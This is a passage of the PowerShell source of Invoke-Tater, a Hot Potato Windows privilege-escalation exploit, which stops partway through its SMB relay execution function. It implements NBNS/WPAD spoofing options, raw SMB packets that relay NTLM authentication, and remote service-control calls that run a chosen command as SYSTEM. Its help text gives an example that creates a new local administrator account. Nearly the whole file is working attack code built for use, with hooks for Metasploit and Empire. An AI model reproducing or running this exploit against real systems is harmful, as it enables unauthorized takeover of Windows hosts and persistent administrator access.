1818 lines
75 KiB
PowerShell
1818 lines
75 KiB
PowerShell
|
function Invoke-Tater
|
||
|
{
|
||
|
<#
|
||
|
.SYNOPSIS
|
||
|
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from
|
||
|
@breenmachine and @foxglovesec.
|
||
|
|
||
|
.DESCRIPTION
|
||
|
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation with functionality
|
||
|
similiar to Potato.exe available at https://github.com/foxglovesec/Potato.
|
||
|
|
||
|
.PARAMETER IP
|
||
|
Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used.
|
||
|
|
||
|
.PARAMETER SpooferIP
|
||
|
Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on
|
||
|
the privesc target.
|
||
|
|
||
|
.PARAMETER Command
|
||
|
Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary.
|
||
|
|
||
|
.PARAMETER NBNS
|
||
|
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing.
|
||
|
|
||
|
.PARAMETER NBNSLimit
|
||
|
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is
|
||
|
resolving correctly.
|
||
|
|
||
|
.PARAMETER ExhaustUDP
|
||
|
Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback
|
||
|
to NBNS resolution.
|
||
|
|
||
|
.PARAMETER HTTPPort
|
||
|
Default = 80: Specify a TCP port for the HTTP listener and redirect response.
|
||
|
|
||
|
.PARAMETER Hostname
|
||
|
Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.
|
||
|
|
||
|
.PARAMETER WPADDirectHosts
|
||
|
Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as
|
||
|
direct.
|
||
|
|
||
|
.PARAMETER WPADPort
|
||
|
Default = 80: Specify a proxy server port to be included in a the wpad.dat file.
|
||
|
|
||
|
.PARAMETER Trigger
|
||
|
Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature
|
||
|
Update, 2 = Windows 10 Webclient/Scheduled Task
|
||
|
|
||
|
.PARAMETER TaskDelete
|
||
|
Default = Tater: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be
|
||
|
added to the taskname to avoid failures after multiple trigger 2 runs.
|
||
|
|
||
|
.PARAMETER Taskname
|
||
|
Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple
|
||
|
trigger 2 runs, try changing the taskname.
|
||
|
|
||
|
.PARAMETER RunTime
|
||
|
(Integer) Set the run time duration in minutes.
|
||
|
|
||
|
.PARAMETER ConsoleOutput
|
||
|
Default = Enabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
|
||
|
ensure that it doesn't hang the shell.
|
||
|
|
||
|
.PARAMETER StatusOutput
|
||
|
Default = Enabled: (Y/N) Enable/Disable startup status messages.
|
||
|
|
||
|
.PARAMETER ShowHelp
|
||
|
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
|
||
|
|
||
|
.PARAMETER Tool
|
||
|
Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
|
||
|
Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
|
||
|
|
||
|
.EXAMPLE
|
||
|
Invoke-Tater -Command "net user Tater Spring2016 /add && net localgroup administrators Tater /add"
|
||
|
|
||
|
.LINK
|
||
|
https://github.com/Kevin-Robertson/Tater
|
||
|
#>
|
||
|
|
||
|
# Default parameter values can be modified in this section
|
||
|
[CmdletBinding()]
|
||
|
param
|
||
|
(
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSLimit="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ExhaustUDP="N",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$TaskDelete="Y",
|
||
|
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
|
||
|
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$IP="",
|
||
|
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$SpooferIP="127.0.0.1",
|
||
|
[parameter(Mandatory=$false)][Int]$HTTPPort="80",
|
||
|
[parameter(Mandatory=$false)][Int]$RunTime="",
|
||
|
[parameter(Mandatory=$false)][ValidateSet(0,1,2)][Int]$Trigger="1",
|
||
|
[parameter(Mandatory=$true)][String]$Command="",
|
||
|
[parameter(Mandatory=$false)][String]$Hostname="WPAD",
|
||
|
[parameter(Mandatory=$false)][String]$Taskname="Tater",
|
||
|
[parameter(Mandatory=$false)][String]$WPADPort="80",
|
||
|
[parameter(Mandatory=$false)][Array]$WPADDirectHosts,
|
||
|
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
|
||
|
)
|
||
|
|
||
|
if ($invalid_parameter)
|
||
|
{
|
||
|
throw "$($invalid_parameter) is not a valid parameter."
|
||
|
}
|
||
|
|
||
|
if(!$IP)
|
||
|
{
|
||
|
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
|
||
|
}
|
||
|
|
||
|
if(!$Command)
|
||
|
{
|
||
|
throw "You must specify an -Command if enabling -SMBRelay"
|
||
|
}
|
||
|
|
||
|
if($tater.running)
|
||
|
{
|
||
|
throw "Invoke-Tater is already running, use Stop-Tater"
|
||
|
}
|
||
|
|
||
|
$global:tater = [HashTable]::Synchronized(@{})
|
||
|
|
||
|
$tater.running = $true
|
||
|
$tater.console_queue = New-Object System.Collections.ArrayList
|
||
|
$tater.status_queue = New-Object System.Collections.ArrayList
|
||
|
$tater.console_input = $true
|
||
|
$tater.SMB_relay_active_step = 0
|
||
|
$tater.trigger = $Trigger
|
||
|
|
||
|
if($StatusOutput -eq 'Y')
|
||
|
{
|
||
|
$tater.status_output = $true
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.status_output = $false
|
||
|
}
|
||
|
|
||
|
if($Tool -eq 1) # Metasploit Interactive Powershell
|
||
|
{
|
||
|
$tater.tool = 1
|
||
|
$tater.newline = ""
|
||
|
$ConsoleOutput = "N"
|
||
|
}
|
||
|
elseif($Tool -eq 2) # PowerShell Empire
|
||
|
{
|
||
|
$tater.tool = 2
|
||
|
$tater.console_input = $false
|
||
|
$tater.newline = "`n"
|
||
|
$ConsoleOutput = "Y"
|
||
|
$ShowHelp = "N"
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.tool = 0
|
||
|
$tater.newline = ""
|
||
|
}
|
||
|
|
||
|
if($Trigger -eq 2)
|
||
|
{
|
||
|
$NBNS = 'N'
|
||
|
}
|
||
|
|
||
|
# Write startup messages
|
||
|
$tater.status_queue.Add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started") > $null
|
||
|
$tater.status_queue.Add("Local IP Address = $IP") > $null
|
||
|
|
||
|
if($HTTPPort -ne 80)
|
||
|
{
|
||
|
$tater.status_queue.Add("HTTP Port = $HTTPPort") > $null
|
||
|
}
|
||
|
|
||
|
if($NBNS -eq 'Y')
|
||
|
{
|
||
|
$tater.status_queue.Add("Spoofing Hostname = $Hostname") > $null
|
||
|
|
||
|
if($NBNSLimit -eq 'N')
|
||
|
{
|
||
|
$tater.status_queue.Add("NBNS Bruteforce Spoofer Limiting Disabled") > $null
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.status_queue.Add("NBNS Bruteforce Spoofing Disabled") > $null
|
||
|
}
|
||
|
|
||
|
if($SpooferIP -ne '127.0.0.1')
|
||
|
{
|
||
|
$tater.status_queue.Add("NBNS Spoofer IP Address = $SpooferIP") > $null
|
||
|
}
|
||
|
|
||
|
if($WPADDirectHosts.Count -gt 0)
|
||
|
{
|
||
|
$tater.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
|
||
|
}
|
||
|
|
||
|
if($WPADPort -ne 80)
|
||
|
{
|
||
|
$tater.status_queue.Add("WPAD Port = $WPADPort") > $null
|
||
|
}
|
||
|
|
||
|
if($ExhaustUDP -eq 'Y')
|
||
|
{
|
||
|
$tater.status_queue.Add("UDP Port Exhaustion Enabled") > $null
|
||
|
}
|
||
|
|
||
|
if($Trigger -eq 0)
|
||
|
{
|
||
|
$tater.status_queue.Add("Relay Trigger Disabled") > $null
|
||
|
}
|
||
|
elseif($Trigger -eq 1)
|
||
|
{
|
||
|
$tater.status_queue.Add("Windows Defender Trigger Enabled") > $null
|
||
|
}
|
||
|
elseif($Trigger -eq 2)
|
||
|
{
|
||
|
$tater.status_queue.Add("Scheduled Task Trigger Enabled") > $null
|
||
|
$tater.taskname = $Taskname -replace " ","_"
|
||
|
|
||
|
if($TaskDelete -eq 'Y')
|
||
|
{
|
||
|
$tater.status_queue.Add("Scheduled Task Prefix = $Taskname") > $null
|
||
|
$tater.status_queue.Add("Scheduled Task Deletion Enabled") > $null
|
||
|
$tater.task_delete = $true
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.status_queue.Add("Scheduled Task = $Taskname") > $null
|
||
|
$tater.status_queue.Add("Scheduled Task Deletion Disabled") > $null
|
||
|
$tater.task_delete = $false
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($ConsoleOutput -eq 'Y')
|
||
|
{
|
||
|
$tater.status_queue.Add("Real Time Console Output Enabled") > $null
|
||
|
$tater.console_output = $true
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
|
||
|
if($tater.tool -eq 1)
|
||
|
{
|
||
|
$tater.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.status_queue.Add("Real Time Console Output Disabled") > $null
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($RunTime -eq '1')
|
||
|
{
|
||
|
$tater.status_queue.Add("Run Time = $RunTime Minute") > $null
|
||
|
}
|
||
|
elseif($RunTime -gt 1)
|
||
|
{
|
||
|
$tater.status_queue.Add("Run Time = $RunTime Minutes") > $null
|
||
|
}
|
||
|
|
||
|
if($ShowHelp -eq 'Y')
|
||
|
{
|
||
|
$tater.status_queue.Add("Run Stop-Tater to stop Tater early") > $null
|
||
|
|
||
|
if($tater.console_output)
|
||
|
{
|
||
|
$tater.status_queue.Add("Use Get-Command -Noun Tater* to show available functions") > $null
|
||
|
$tater.status_queue.Add("Press any key to stop real time console output") > $null
|
||
|
$tater.status_queue.Add("") > $null
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($tater.status_output)
|
||
|
{
|
||
|
|
||
|
while($tater.status_queue.Count -gt 0)
|
||
|
{
|
||
|
write-output($tater.status_queue[0] + $tater.newline)
|
||
|
$tater.status_queue.RemoveRange(0,1)
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
|
||
|
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
|
||
|
$process_ID = $process_ID -replace "-00-00",""
|
||
|
[Byte[]] $tater.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
|
||
|
# Begin ScriptBlocks
|
||
|
|
||
|
# Shared Basic Functions ScriptBlock
|
||
|
$shared_basic_functions_scriptblock =
|
||
|
{
|
||
|
|
||
|
function DataLength
|
||
|
{
|
||
|
param ([Int]$length_start,[Byte[]]$string_extract_data)
|
||
|
|
||
|
$string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
|
||
|
return $string_length
|
||
|
}
|
||
|
|
||
|
function DataToString
|
||
|
{
|
||
|
param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
|
||
|
|
||
|
$string_data = [System.BitConverter]::ToString($string_extract_data[($string_start + $string2_length + $string3_length)..($string_start + $string_length + $string2_length + $string3_length - 1)])
|
||
|
$string_data = $string_data -replace "-00",""
|
||
|
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
|
||
|
return $string_extract
|
||
|
}
|
||
|
|
||
|
function DnsFlushResolverCache
|
||
|
{
|
||
|
$DNS_member_definition = @'
|
||
|
[DllImport("dnsapi.dll", EntryPoint="DnsFlushResolverCache")]
|
||
|
private static extern UInt32 DnsFlushResolverCache();
|
||
|
|
||
|
public static void FlushResolverCache()
|
||
|
{
|
||
|
UInt32 result = DnsFlushResolverCache();
|
||
|
}
|
||
|
'@
|
||
|
|
||
|
Add-Type -MemberDefinition $DNS_member_definition -Namespace DNSAPI -Name Flush -UsingNamespace System.Collections,System.ComponentModel
|
||
|
[DNSAPI.Flush]::FlushResolverCache()
|
||
|
}
|
||
|
|
||
|
function StopTater
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Stopping HTTP listener")
|
||
|
$tater.HTTP_client.Close()
|
||
|
start-sleep -s 1
|
||
|
$tater.HTTP_listener.server.blocking = $false
|
||
|
Start-Sleep -s 1
|
||
|
$tater.HTTP_listener.server.Close()
|
||
|
Start-Sleep -s 1
|
||
|
$tater.HTTP_listener.Stop()
|
||
|
|
||
|
if($tater.SMBRelay_success)
|
||
|
{
|
||
|
|
||
|
if($tater.trigger -eq 2)
|
||
|
{
|
||
|
|
||
|
if($tater.task_delete -and $tater.task_added)
|
||
|
{
|
||
|
$scheduled_task_deleted = $false
|
||
|
$schedule_service = new-object -com("Schedule.Service")
|
||
|
$schedule_service.Connect()
|
||
|
$scheduled_task_folder = $schedule_service.GetFolder("\")
|
||
|
$scheduled_task_list = $scheduled_task_folder.GetTasks(1)
|
||
|
|
||
|
foreach($scheduled_task in $scheduled_task_list)
|
||
|
{
|
||
|
|
||
|
if($scheduled_task.name -eq $tater.task)
|
||
|
{
|
||
|
$scheduled_task_folder.DeleteTask($scheduled_task.name,0)
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
foreach($scheduled_task in $scheduled_task_list)
|
||
|
{
|
||
|
|
||
|
if($scheduled_task.name -eq $tater.task)
|
||
|
{
|
||
|
$scheduled_task_deleted = $true
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($scheduled_task_deleted)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully")
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
elseif($tater.task_added)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Tater was successful and has exited")
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Tater was not successful and has exited")
|
||
|
}
|
||
|
|
||
|
Start-Sleep -s 1
|
||
|
$tater.running = $false
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
|
||
|
$SMB_NTLM_functions_scriptblock =
|
||
|
{
|
||
|
|
||
|
function SMBNTLMChallenge
|
||
|
{
|
||
|
param ([Byte[]]$payload_bytes)
|
||
|
|
||
|
$payload = [System.BitConverter]::ToString($payload_bytes)
|
||
|
$payload = $payload -replace "-",""
|
||
|
$NTLM_index = $payload.IndexOf("4E544C4D53535000")
|
||
|
|
||
|
if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
|
||
|
{
|
||
|
$NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
|
||
|
}
|
||
|
|
||
|
return $NTLM_challenge
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
|
||
|
$SMB_relay_challenge_scriptblock =
|
||
|
{
|
||
|
|
||
|
function SMBRelayChallenge
|
||
|
{
|
||
|
param ($SMB_relay_socket,$HTTP_request_bytes)
|
||
|
|
||
|
if ($SMB_relay_socket)
|
||
|
{
|
||
|
$SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
|
||
|
}
|
||
|
|
||
|
$SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
|
||
|
$i = 0
|
||
|
|
||
|
:SMB_relay_challenge_loop while ($i -lt 2)
|
||
|
{
|
||
|
|
||
|
switch ($i)
|
||
|
{
|
||
|
|
||
|
0
|
||
|
{
|
||
|
$SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0xff,0xff +
|
||
|
$tater.process_ID_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
|
||
|
0x20,0x30,0x2e,0x31,0x32,0x00
|
||
|
}
|
||
|
|
||
|
1
|
||
|
{
|
||
|
$SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
|
||
|
$SMB_blob_length = $SMB_blob_length -replace "-00-00",""
|
||
|
$SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
|
||
|
$SMB_byte_count = $SMB_byte_count -replace "-00-00",""
|
||
|
$SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 87))
|
||
|
$SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
|
||
|
$SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
[Array]::Reverse($SMB_netbios_length)
|
||
|
|
||
|
$SMB_relay_challenge_send = 0x00,0x00 +
|
||
|
$SMB_netbios_length +
|
||
|
0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
|
||
|
$tater.process_ID_bytes +
|
||
|
0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
|
||
|
0x01,0x00,0x00,0x00,0x00,0x00 +
|
||
|
$SMB_blob_length +
|
||
|
0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
|
||
|
$SMB_byte_count +
|
||
|
$HTTP_request_bytes +
|
||
|
0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
|
||
|
0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,
|
||
|
0x00,0x00
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
|
||
|
$SMB_relay_challenge_stream.Flush()
|
||
|
$SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
|
||
|
$i++
|
||
|
}
|
||
|
|
||
|
return $SMB_relay_challenge_bytes
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
|
||
|
$SMB_relay_response_scriptblock =
|
||
|
{
|
||
|
|
||
|
function SMBRelayResponse
|
||
|
{
|
||
|
param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
|
||
|
|
||
|
$SMB_relay_response_bytes = New-Object System.Byte[] 1024
|
||
|
|
||
|
if ($SMB_relay_socket)
|
||
|
{
|
||
|
$SMB_relay_response_stream = $SMB_relay_socket.GetStream()
|
||
|
}
|
||
|
|
||
|
$SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
|
||
|
$SMB_blob_length = $SMB_blob_length -replace "-00-00",""
|
||
|
$SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
|
||
|
$SMB_byte_count = $SMB_byte_count -replace "-00-00",""
|
||
|
$SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 88))
|
||
|
$SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
|
||
|
$SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
[Array]::Reverse($SMB_netbios_length)
|
||
|
$j = 0
|
||
|
|
||
|
:SMB_relay_response_loop while ($j -lt 1)
|
||
|
{
|
||
|
$SMB_relay_response_send = 0x00,0x00 +
|
||
|
$SMB_netbios_length +
|
||
|
0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,
|
||
|
0x00,0x00,0x00 +
|
||
|
$SMB_blob_length +
|
||
|
0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
|
||
|
$SMB_byte_count +
|
||
|
$HTTP_request_bytes +
|
||
|
0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
|
||
|
0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,
|
||
|
0x00
|
||
|
|
||
|
$SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
|
||
|
$SMB_relay_response_stream.Flush()
|
||
|
$SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
|
||
|
$tater.SMB_relay_active_step = 2
|
||
|
$j++
|
||
|
}
|
||
|
|
||
|
return $SMB_relay_response_bytes
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
|
||
|
$SMB_relay_execute_scriptblock =
|
||
|
{
|
||
|
|
||
|
function SMBRelayExecute
|
||
|
{
|
||
|
param ($SMB_relay_socket,$SMB_user_ID)
|
||
|
|
||
|
if ($SMB_relay_socket)
|
||
|
{
|
||
|
$SMB_relay_execute_stream = $SMB_relay_socket.GetStream()
|
||
|
}
|
||
|
|
||
|
$SMB_relay_failed = $false
|
||
|
$SMB_relay_execute_bytes = New-Object System.Byte[] 1024
|
||
|
$SMB_service_random = [String]::Join("00-", (1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
|
||
|
$SMB_service = $SMB_service_random -replace "-00",""
|
||
|
$SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1)
|
||
|
$SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
|
||
|
$SMB_service_random += '00-00-00'
|
||
|
[Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_referent_ID_bytes = [String](1..4 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
|
||
|
$SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$Command = "%COMSPEC% /C `"" + $Command + "`""
|
||
|
[System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{ $SMB_relay_command += "{0:X2}-00-" -f $_ }
|
||
|
|
||
|
if([Bool]($Command.Length % 2))
|
||
|
{
|
||
|
$SMB_relay_command += '00-00'
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$SMB_relay_command += '00-00-00-00'
|
||
|
}
|
||
|
|
||
|
[Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
||
|
$SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
|
||
|
$SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
|
||
|
$SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
|
||
|
$SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]
|
||
|
$SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
|
||
|
$k = 0
|
||
|
|
||
|
:SMB_relay_execute_loop while ($k -lt 12)
|
||
|
{
|
||
|
|
||
|
switch ($k)
|
||
|
{
|
||
|
|
||
|
0
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0xff,0xff +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
|
||
|
0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
|
||
|
0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
|
||
|
}
|
||
|
|
||
|
1
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
|
||
|
0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
|
||
|
}
|
||
|
|
||
|
2
|
||
|
{
|
||
|
$SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
|
||
|
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
|
||
|
0x00,0x00,0x00,0x08 +
|
||
|
$tater.process_ID_bytes +
|
||
|
$SMB_user_ID +
|
||
|
0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
|
||
|
0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
|
||
|
0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
|
||
|
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
|
||
|
0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
|
||
|
0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
|
||
|
0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
|
||
|
0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
|
||
|
0x00
|
||
|
|
||
|
$SMB_multiplex_id = 0x05
|
||
|
}
|
